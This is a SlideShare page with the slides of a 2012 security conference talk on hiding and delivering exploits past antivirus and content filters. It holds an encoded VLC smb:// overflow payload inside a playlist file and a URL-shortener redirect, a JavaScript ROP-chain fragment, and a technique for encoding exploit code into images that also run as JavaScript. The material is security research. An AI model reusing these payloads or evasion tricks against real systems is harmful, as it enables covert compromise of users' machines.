SlideShare a Scribd company logo

When Bad Things Come In Good Packages

Saumil Shah
Saumil Shah

My DEEPSEC 2012 talk explores the fine art of packaging when it comes to exploits. No this is not another talk about packers or crypters. We are talking STYLE! A successful exploit is one that is innovatively delivered, in style. We shall be talking about a number of sneaky, funny and innovative techniques for delivering exploits to their doorsteps without annoyances like anti-virus or content filtering getting in the way. This talk goes beyond the obvious obfuscation. We combine the power of web hacking, the power of sophisticated exploit development and goofball creativity to ensure that exploits get delivered and detonate on time, as planned. Did you know you can literally paint an exploit on canvas? Have you heard of chameleon Javascript? This and more in the talk!

Technology
1 of 32
when Bad Things come in Good packages Saumil Shah net-square DEEPSEC 2012
# who am i Saumil Shah, CEO Net-Square. •  Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. •  M.S. Computer Science Purdue University. •  saumil@net-square.com •  LinkedIn: saumilshah •  Twitter: @therealsaumil net-square
My area of work Penetration Reverse Exploit Testing Engineering Writing New Offensive Attack Research Security Defense Conference Conference "Eyes and Speaker Trainer ears open" net-square
When two forces combine... Web Binary Hacking Exploits net-square
SNEAKY LETHAL net-square
net-square
302 IMG JS HTML5 net-square
net-square
VLC smb overflow •  smb://example.com@0.0.0.0/foo/ #{AAAAAAAA....} •  Classic Stack Overflow. net-square
VLC XSPF file <?xml version="1.0" encoding="UTF-8"?>! <playlist version="1"! xmlns="http://xspf.org/ns/0/"! xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">! <title>Playlist</title>! <trackList>! <track>! <location>! smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}! </location>! <extension! application="http://www.videolan.org/vlc/playlist/0">! <vlc:id>0</vlc:id>! </extension>! </track>! </trackList>! </playlist>! net-square
Alpha Encoded Tiny ZOMFG! Exploit URL net-square
100% Pure Alphanum! net-square
VLC smb overflow - HTMLized!! "<embed type="application/x-vlc-plugin"! " "width="320" height="200"! " "target="http://tinyurl.com/ycctrzf"! " "id="vlc" />! net-square
301 Redirect from tinyurl HTTP/1.1 301 Moved Permanently! X-Powered-By: PHP/5.2.12! Location: smb://example.com@0.0.0.0/foo/ #{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1! JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNOQeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYII! IIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoL! KPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIPQdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHk! PfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJcEaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxH! kEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOsIPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDn! CUCHPeEPAA}! Content-type: text/html! Content-Length: 0! Connection: close! Server: TinyURL/1.6! net-square
net-square
Exploits as Images - 1 •  Grayscale encoding (0-255). •  1 pixel = 1 character. •  Perfectly valid image. •  Decode and Execute! net-square
net-square
I'm an evil Javascript I'm an innocent image net-square
function packv(n) {var s=new Number(n).toStri ng(16);while(s.l return(unescape( ength<8)s="0"+s; "%u"+s.substring string(0,4)))}va (4,8)+"%u"+s.sub r addressof=new Array();addresso f["ropnop"]=0x6d ["xchg_eax_esp_r 81bdf0;addressof et"]=0x6d81bdef; ax_ret"]=0x6d906 addressof["pop_e 744;addressof["p d81cd57;addresso op_ecx_ret"]=0x6 f["mov_peax_ecx_ ;addressof["mov_ ret"]=0x6d979720 eax_pecx_ret"]=0 sof["mov_pecx_ea x6d8d7be0;addres x_ret"]=0x6d8eee c_eax_ret"]=0x6d 01;addressof["in 838f54;addressof ]=0x00000000;add ["add_eax_4_ret" ressof["call_pea 31;addressof["ad x_ret"]=0x6d8aec d_esp_24_ret"]=0 sof["popad_ret"] x00000000;addres =0x6d82a8a1;addr "]=0x6d802597;fu essof["call_peax nction call_ntallocatev irtualmemory(bas m){var ropnop=pac eptr,size,callnu kv(addressof["ro pop_eax_ret=pack pnop"]);var v(addressof["pop pop_ecx_ret=pack _eax_ret"]);var v(addressof["pop mov_peax_ecx_ret _ecx_ret"]);var =packv(addressof et"]);var ["mov_peax_ecx_r mov_eax_pecx_ret =packv(addressof et"]);var ["mov_eax_pecx_r mov_pecx_eax_ret =packv(addressof et"]);var ["mov_pecx_eax_r call_peax_ret=pa ckv(addressof["c var all_peax_ret"]); add_esp_24_ret=p ackv(addressof[" );var add_esp_24_ret"] popad_ret=packv( addressof["popad retval=""! _ret"]);var <CANVAS> net-square
net-square See no eval()
Same Same No Different! var a = eval(str); a = (new Function(str))(); net-square
IMAJS net-square I iz being a Javascript
IMAJS <img src="itsatrap.gif"> <script src="itsatrap.gif"> </script> net-square
IMAJS-GIF Browser Support Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE no yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera ? ? 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer no - 2f 2a 00 00 Win 7 Preview yes - net-square
IMAJS-BMP Browser Support Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE yes yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer yes - 2f 2a 00 00 Win 7 Preview yes - net-square
The αq Exploit net-square
Demo IMAJS αq FTW! net-square
Alpha encoded exploit code IMAJS CANVAS "loader" script net-square
These are not the sploits you're looking for net-square
No virus threat detected net-square
The FUTURE? net-square
when Bad Things come in Good packages THE END @therealsaumil saumil@net-square.com net-square

Recommended

Ppt on cloud computing
Ppt on cloud computingPpt on cloud computing
Ppt on cloud computingPradeep Bhatia
 
Cloud Infrastructure m Service Delivery Models (IAAS, PAAS and SAAS) Cloud D...
Cloud Infrastructure m Service Delivery Models (IAAS, PAAS and SAAS) Cloud D...Cloud Infrastructure m Service Delivery Models (IAAS, PAAS and SAAS) Cloud D...
Cloud Infrastructure m Service Delivery Models (IAAS, PAAS and SAAS) Cloud D...Govt. P.G. College Dharamshala
 
Tuning and Troubleshooting OpenSplice DDS Applications
Tuning and Troubleshooting OpenSplice DDS ApplicationsTuning and Troubleshooting OpenSplice DDS Applications
Tuning and Troubleshooting OpenSplice DDS ApplicationsAngelo Corsaro
 
Cloud Computing overview and case study
Cloud Computing overview and case studyCloud Computing overview and case study
Cloud Computing overview and case studyBabak Hosseinzadeh
 
PHP Installed on IBM i - the Nickel Tour
PHP Installed on IBM i - the Nickel TourPHP Installed on IBM i - the Nickel Tour
PHP Installed on IBM i - the Nickel TourRod Flohr
 
Apostila minicurso-unity
Apostila minicurso-unityApostila minicurso-unity
Apostila minicurso-unityJennifer Sousa
 
Cloud computing
Cloud computingCloud computing
Cloud computingPallavi Rai
 
Cloud computing présenté par Doumbia tidiane
Cloud computing présenté par Doumbia tidianeCloud computing présenté par Doumbia tidiane
Cloud computing présenté par Doumbia tidiane@aboukam (Abou Kamagaté)
 

Recommended

Ppt on cloud computing
Ppt on cloud computingPpt on cloud computing
Ppt on cloud computingPradeep Bhatia
 
Cloud Infrastructure m Service Delivery Models (IAAS, PAAS and SAAS) Cloud D...
Cloud Infrastructure m Service Delivery Models (IAAS, PAAS and SAAS) Cloud D...Cloud Infrastructure m Service Delivery Models (IAAS, PAAS and SAAS) Cloud D...
Cloud Infrastructure m Service Delivery Models (IAAS, PAAS and SAAS) Cloud D...Govt. P.G. College Dharamshala
 
Tuning and Troubleshooting OpenSplice DDS Applications
Tuning and Troubleshooting OpenSplice DDS ApplicationsTuning and Troubleshooting OpenSplice DDS Applications
Tuning and Troubleshooting OpenSplice DDS ApplicationsAngelo Corsaro
 
Cloud Computing overview and case study
Cloud Computing overview and case studyCloud Computing overview and case study
Cloud Computing overview and case studyBabak Hosseinzadeh
 
PHP Installed on IBM i - the Nickel Tour
PHP Installed on IBM i - the Nickel TourPHP Installed on IBM i - the Nickel Tour
PHP Installed on IBM i - the Nickel TourRod Flohr
 
Apostila minicurso-unity
Apostila minicurso-unityApostila minicurso-unity
Apostila minicurso-unityJennifer Sousa
 
Cloud computing
Cloud computingCloud computing
Cloud computingPallavi Rai
 
Cloud computing présenté par Doumbia tidiane
Cloud computing présenté par Doumbia tidianeCloud computing présenté par Doumbia tidiane
Cloud computing présenté par Doumbia tidiane@aboukam (Abou Kamagaté)
 
HA & DR System Design - Concepts and Solution
HA & DR System Design - Concepts and SolutionHA & DR System Design - Concepts and Solution
HA & DR System Design - Concepts and SolutionContinuity and Resilience
 
Cloud Computing Risk Management (IIA Webinar)
Cloud Computing Risk Management (IIA Webinar)Cloud Computing Risk Management (IIA Webinar)
Cloud Computing Risk Management (IIA Webinar)Brian K. Dickard
 
20 Tips for OpenSplice Newbies
20 Tips for OpenSplice Newbies20 Tips for OpenSplice Newbies
20 Tips for OpenSplice NewbiesAngelo Corsaro
 
Dalil aqli dan naqli tentang malaikat
Dalil aqli dan naqli tentang malaikatDalil aqli dan naqli tentang malaikat
Dalil aqli dan naqli tentang malaikatAfifah Zulianuriauwani
 
The seminar report on cloud computing
The seminar report on cloud computingThe seminar report on cloud computing
The seminar report on cloud computingDivyesh Shah
 
Scheduling in Cloud Computing
Scheduling in Cloud ComputingScheduling in Cloud Computing
Scheduling in Cloud ComputingHitesh Mohapatra
 
Privacy in cloud computing
Privacy in cloud computingPrivacy in cloud computing
Privacy in cloud computingAhmed Nour
 
Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSSaumil Shah
 
Innovative Exploit Delivery
Innovative Exploit DeliveryInnovative Exploit Delivery
Innovative Exploit DeliverySaumil Shah
 
Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Saumil Shah
 
Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit DeliverySaumil Shah
 
Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014Saumil Shah
 
Hack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsHack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsSaumil Shah
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingSaumil Shah
 
JavaFX
JavaFXJavaFX
JavaFXRaphael Marques
 
Refactoring to Macros with Clojure
Refactoring to Macros with ClojureRefactoring to Macros with Clojure
Refactoring to Macros with ClojureDmitry Buzdin
 
Marat-Slides
Marat-SlidesMarat-Slides
Marat-SlidesMarat Vyshegorodtsev
 
3
33
3Marat Vyshegorodtsev
 
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to usThat Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to ustakesako
 
Intravert Server side processing for Cassandra
Intravert Server side processing for CassandraIntravert Server side processing for Cassandra
Intravert Server side processing for CassandraEdward Capriolo
 
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"DataStax Academy
 
CoffeeScript
CoffeeScriptCoffeeScript
CoffeeScriptRyan McGeary
 

More Related Content

What's hot

HA & DR System Design - Concepts and Solution
HA & DR System Design - Concepts and SolutionHA & DR System Design - Concepts and Solution
HA & DR System Design - Concepts and SolutionContinuity and Resilience
 
Cloud Computing Risk Management (IIA Webinar)
Cloud Computing Risk Management (IIA Webinar)Cloud Computing Risk Management (IIA Webinar)
Cloud Computing Risk Management (IIA Webinar)Brian K. Dickard
 
20 Tips for OpenSplice Newbies
20 Tips for OpenSplice Newbies20 Tips for OpenSplice Newbies
20 Tips for OpenSplice NewbiesAngelo Corsaro
 
The seminar report on cloud computing
The seminar report on cloud computingThe seminar report on cloud computing
The seminar report on cloud computingDivyesh Shah
 
Scheduling in Cloud Computing
Scheduling in Cloud ComputingScheduling in Cloud Computing
Scheduling in Cloud ComputingHitesh Mohapatra
 
Privacy in cloud computing
Privacy in cloud computingPrivacy in cloud computing
Privacy in cloud computingAhmed Nour
 

What's hot (7)

HA & DR System Design - Concepts and Solution
HA & DR System Design - Concepts and SolutionHA & DR System Design - Concepts and Solution
HA & DR System Design - Concepts and Solution
 
Cloud Computing Risk Management (IIA Webinar)
Cloud Computing Risk Management (IIA Webinar)Cloud Computing Risk Management (IIA Webinar)
Cloud Computing Risk Management (IIA Webinar)
 
20 Tips for OpenSplice Newbies
20 Tips for OpenSplice Newbies20 Tips for OpenSplice Newbies
20 Tips for OpenSplice Newbies
 
Dalil aqli dan naqli tentang malaikat
Dalil aqli dan naqli tentang malaikatDalil aqli dan naqli tentang malaikat
Dalil aqli dan naqli tentang malaikat
 
The seminar report on cloud computing
The seminar report on cloud computingThe seminar report on cloud computing
The seminar report on cloud computing
 
Scheduling in Cloud Computing
Scheduling in Cloud ComputingScheduling in Cloud Computing
Scheduling in Cloud Computing
 
Privacy in cloud computing
Privacy in cloud computingPrivacy in cloud computing
Privacy in cloud computing
 

Viewers also liked

Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSSaumil Shah
 
Innovative Exploit Delivery
Innovative Exploit DeliveryInnovative Exploit Delivery
Innovative Exploit DeliverySaumil Shah
 
Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Saumil Shah
 
Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit DeliverySaumil Shah
 
Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014Saumil Shah
 
Hack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsHack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsSaumil Shah
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingSaumil Shah
 

Viewers also liked (7)

Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMS
 
Innovative Exploit Delivery
Innovative Exploit DeliveryInnovative Exploit Delivery
Innovative Exploit Delivery
 
Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Deadly pixels - NSC 2013
Deadly pixels - NSC 2013
 
Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit Delivery
 
Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014
 
Hack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsHack.LU - The Infosec Crossroads
Hack.LU - The Infosec Crossroads
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented Programming
 

Similar to When Bad Things Come In Good Packages

Refactoring to Macros with Clojure
Refactoring to Macros with ClojureRefactoring to Macros with Clojure
Refactoring to Macros with ClojureDmitry Buzdin
 
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to usThat Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to ustakesako
 
Intravert Server side processing for Cassandra
Intravert Server side processing for CassandraIntravert Server side processing for Cassandra
Intravert Server side processing for CassandraEdward Capriolo
 
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"DataStax Academy
 
Ruby on Rails 3.1: Let's bring the fun back into web programing
Ruby on Rails 3.1: Let's bring the fun back into web programingRuby on Rails 3.1: Let's bring the fun back into web programing
Ruby on Rails 3.1: Let's bring the fun back into web programingBozhidar Batsov
 
Locks? We Don't Need No Stinkin' Locks - Michael Barker
Locks? We Don't Need No Stinkin' Locks - Michael BarkerLocks? We Don't Need No Stinkin' Locks - Michael Barker
Locks? We Don't Need No Stinkin' Locks - Michael BarkerJAX London
 
Lock? We don't need no stinkin' locks!
Lock? We don't need no stinkin' locks!Lock? We don't need no stinkin' locks!
Lock? We don't need no stinkin' locks!Michael Barker
 
Marrow: A Meta-Framework for Python 2.6+ and 3.1+
Marrow: A Meta-Framework for Python 2.6+ and 3.1+Marrow: A Meta-Framework for Python 2.6+ and 3.1+
Marrow: A Meta-Framework for Python 2.6+ and 3.1+ConFoo
 
DEF CON 23 - CHRIS DOMAS - REpsych
DEF CON 23 - CHRIS DOMAS - REpsychDEF CON 23 - CHRIS DOMAS - REpsych
DEF CON 23 - CHRIS DOMAS - REpsychFelipe Prado
 
Drawing on canvas
Drawing on canvasDrawing on canvas
Drawing on canvassuitzero
 
React Native - Workshop
React Native - WorkshopReact Native - Workshop
React Native - WorkshopFellipe Chagas
 
Crafting Custom Interfaces with Sub::Exporter
Crafting Custom Interfaces with Sub::ExporterCrafting Custom Interfaces with Sub::Exporter
Crafting Custom Interfaces with Sub::ExporterRicardo Signes
 

Similar to When Bad Things Come In Good Packages (20)

JavaFX
JavaFXJavaFX
JavaFX
 
Refactoring to Macros with Clojure
Refactoring to Macros with ClojureRefactoring to Macros with Clojure
Refactoring to Macros with Clojure
 
Marat-Slides
Marat-SlidesMarat-Slides
Marat-Slides
 
3
33
3
 
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to usThat Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
 
Intravert Server side processing for Cassandra
Intravert Server side processing for CassandraIntravert Server side processing for Cassandra
Intravert Server side processing for Cassandra
 
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
 
CoffeeScript
CoffeeScriptCoffeeScript
CoffeeScript
 
Raphaël and You
Raphaël and YouRaphaël and You
Raphaël and You
 
Array strings
Array stringsArray strings
Array strings
 
Ruby on Rails 3.1: Let's bring the fun back into web programing
Ruby on Rails 3.1: Let's bring the fun back into web programingRuby on Rails 3.1: Let's bring the fun back into web programing
Ruby on Rails 3.1: Let's bring the fun back into web programing
 
nullcon 2011 - Lessons learned from 2010
nullcon 2011 - Lessons learned from 2010nullcon 2011 - Lessons learned from 2010
nullcon 2011 - Lessons learned from 2010
 
PHP and MySQL
PHP and MySQLPHP and MySQL
PHP and MySQL
 
Locks? We Don't Need No Stinkin' Locks - Michael Barker
Locks? We Don't Need No Stinkin' Locks - Michael BarkerLocks? We Don't Need No Stinkin' Locks - Michael Barker
Locks? We Don't Need No Stinkin' Locks - Michael Barker
 
Lock? We don't need no stinkin' locks!
Lock? We don't need no stinkin' locks!Lock? We don't need no stinkin' locks!
Lock? We don't need no stinkin' locks!
 
Marrow: A Meta-Framework for Python 2.6+ and 3.1+
Marrow: A Meta-Framework for Python 2.6+ and 3.1+Marrow: A Meta-Framework for Python 2.6+ and 3.1+
Marrow: A Meta-Framework for Python 2.6+ and 3.1+
 
DEF CON 23 - CHRIS DOMAS - REpsych
DEF CON 23 - CHRIS DOMAS - REpsychDEF CON 23 - CHRIS DOMAS - REpsych
DEF CON 23 - CHRIS DOMAS - REpsych
 
Drawing on canvas
Drawing on canvasDrawing on canvas
Drawing on canvas
 
React Native - Workshop
React Native - WorkshopReact Native - Workshop
React Native - Workshop
 
Crafting Custom Interfaces with Sub::Exporter
Crafting Custom Interfaces with Sub::ExporterCrafting Custom Interfaces with Sub::Exporter
Crafting Custom Interfaces with Sub::Exporter
 

More from Saumil Shah

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksSaumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSSaumil Shah
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkSaumil Shah
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Saumil Shah
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise PresentationsSaumil Shah
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceSaumil Shah
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020Saumil Shah
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadSaumil Shah
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceSaumil Shah
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadSaumil Shah
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadSaumil Shah
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019Saumil Shah
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-XSaumil Shah
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDSaumil Shah
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019Saumil Shah
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019Saumil Shah
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM AssemblySaumil Shah
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSSaumil Shah
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling PhotographSaumil Shah
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKSaumil Shah
 

More from Saumil Shah (20)

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
 

Recently uploaded

What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
